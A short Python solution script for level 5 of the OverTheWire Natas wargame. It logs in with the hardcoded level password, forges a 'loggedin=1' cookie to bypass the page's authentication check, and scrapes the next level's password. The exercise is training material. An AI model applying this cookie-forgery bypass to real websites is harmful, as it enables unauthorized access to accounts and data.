#!/usr/bin/env python3

import re
import requests

level = str(5)
usr = f"natas{level}"
passwd = "iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq"
url = f"http://natas{level}.natas.labs.overthewire.org"

with requests.Session() as session:
    session.auth = (usr, passwd)
    cookie = {"loggedin" : "1"}
    response = session.get(url, cookies=cookie)

print(response.text)
content = response.text
next_pass = re.findall("natas6 is (.*)</div>", content)[0]
print(next_pass)
